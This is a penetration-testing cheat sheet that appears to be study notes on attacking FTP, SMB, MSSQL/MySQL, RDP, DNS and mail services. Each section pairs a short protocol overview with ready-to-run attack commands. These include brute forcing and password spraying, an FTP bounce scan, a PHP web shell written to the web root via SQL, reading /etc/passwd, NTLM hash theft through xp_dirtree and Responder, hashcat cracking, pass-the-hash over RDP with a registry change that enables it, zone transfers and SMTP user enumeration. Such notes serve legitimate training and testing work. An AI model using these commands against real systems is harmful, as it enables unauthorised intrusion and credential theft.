Attacking Common Services (Just Do Formatting)
This section isn't so good, we can remove or add more into it
File Transfer Protocol (FTP)
The File Transfer Protocol (FTP) is a standard network protocol used to transfer files between computers. It also performs directory and files operations, such as changing the working directory, listing files, and renaming and deleting directories or files.
Some of the common attacks on FTP:
Check if the FTP server allows anonymous logins
Bruteforcing the service, if we find a username that we know exist, we can use it to bruteforce the service or we can even perform a password spray attack
FTP bounce attack which is a network attack that uses FTP servers to deliver outbound traffic to another device on the network.
#Medusa bruteforce attack
medusa -u <Username> -P <Password-Word-List> -h <IP-Address> -M ftp
#Nmap bounce attack command
sudo nmap -Pn -v -n -p80 -b <Username>:<Password>@<FTP-Server-IP-Address> <Internal-Target-IP-Address>
Server Message Block (SMB)
Server Message Block (SMB) is a communication protocol created for providing shared access to files and printers across nodes on a network.
Tools like smbclinet, smbmap, rpcclient, and enum4linux-ng can be used to interact with and test an smb server.
Some of the common attacks on SMB:
Check if the SMB allows anonymous authentication
Try bruteforcing or password spraying attacks
#Display a list of server shares (-N to use null session (anonymous))
smbclient -N -L //<IP-Address>
#Smbmap commands
smbmap -H <IP-Address> -R #List server shares (-R to perform recursive listing)
smbmap -H <IP-Address> --download "<File-Path>" #Download the file specified
smbmap -H <IP-Address> --upload <File-To-Upload> "<File-Path>" #Download the file specified
#Runs enum4linux-ng scans
enum4linux-ng.py <IP-Address> -A -C
#Password spraying an smb server using crackmapexec
crackmapexec smb <IP-Address> -u <User-List> -p '<Password>' --local-auth
SQL Databases
MySQL and Microsoft SQL Server (MSSQL) are relational database management systems that store data in tables, columns, and rows.
MSSQL supports two authentication modes, Windows authentication and SQL server authentication.
There are some default databases that contain information about the database itself.
MySQL default system schemas/databases:
mysql - is the system database that contains tables that store information required by the MySQL server
information_schema - provides access to database metadata
performance_schema - is a feature for monitoring MySQL Server execution at a low level sys - a set of objects that helps DBAs and developers interpret data collected by the Performance Schema
MSSQL default system schemas/databases:
master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that keeps system objects visible in every database on the server in sys schema.
tempdb - keeps temporary objects for SQL queries.
We can use SQL databases to do more than SQL queries for example, we can write and read files, or we can access other linked databases
#To Connect to MSSql (windows-auth for windows authentication)
mssqlclient.py <Username>@<IP-Address> -windows-auth
#To read the tables in a database
SELECT * FROM <DB-Name>.INFORMATION_SCHEMA.TABLES
#MSSql Write and reading files:
SELECT "<?php echo shell_exec($_GET['c']);?>" INTO OUTFILE '/var/www/html/webshell.php';
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
#MySQL writing and reading files:
mysql -h <IP-Address> -P <Port-Number> -u <Username>
select LOAD_FILE("/etc/passwd");
#To Steal the hash of the MsSQL user
sudo responder -I tun0 #Start a listener
EXEC master..xp_dirtree '\\<Your-IP-Address>\share\' #Send the hash
hashcat -m 5600 <Hash-File> <Password-List> #To decode the hash
Remote Desktop Protocol (RDP)
Remote Desktop Protocol (RDP) is a proprietary protocol developed by Microsoft which provides a user with a graphical interface to connect to another computer over a network connection.
For RDP, we can try password spraying attacks using tools like hydra
On older versions (before Server 2019) we could have hijacked a session.
We can also perform Pass The Hash (PtH) attack
#To connect to an RDP server
rdesktop -u <Username> -p <Password> <IP-Address>
#Pass the Hash command
xfreerdp /v:<IP-Address> /u:<Username> /pth:<Hash>
#For Pass the Hash to work
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Domain Name System (DNS)
Domain Name System (DNS) translates domain names (e.g., hackthebox.com) to the numerical IP addresses (e.g., 104.17.42.72)
For DNS we can enumrate in general as it would open gates for new attack vectors
We can also attempt a zone transfer attack
DNS spoofing can be used to redirect users to a malicious page crafted by the attacker.
Tools like subrute and subfinder can be used to enumrate subdomains.
Subdomain Takeover is another attack that we can try, if there are records in the DNS that aren't maintained we can takeover these subdomains and then direct the users to a malicious page or even conduct a phishing campaign
#Zone Transfer Attack commands from different tools
dig AXFR <Name-Server> <Domain>
fierce --domain <Domain>
Email Services
A mail server (sometimes also referred to as an email server) is a server that handles and delivers email over a network, usually over the Internet.
We can use the Mail eXchanger (MX) DNS record to identify a mail server.
We can use several commnds to enumrate users on an smtp user
After identifying a valid users we can use tools like hydra to run bruteforce attacks or password spray attacks against the valid users.
#Commands to enumrate users using an SMTP server
telnet <IP-Address> 25 #Connect to SMTP
VRFY <Username>
EXPN <Username-Or-Email-Group>
MAIL FROM:<Email-Address>
RCPT TO:<Username>
#Commands for POP3 server
telnet <IP-Address> 110 #Connect to the POP3 server
USER <Username> #Can be used to enumrate and login
PASS <Password> #If you need to login
LIST #List the emails
RETR <Email-ID> #Read the email
#SMTP-User-Enam command
smtp-user-enum -M <Module-Name> -U <Username-WordList> -D <Domain-Name> -t <IP-Address>
#Hydra bruteforce command
hydra -l <Email-Address> -P <Password-Wrodlist> pop3://<IP-Address> -t 10
Last updated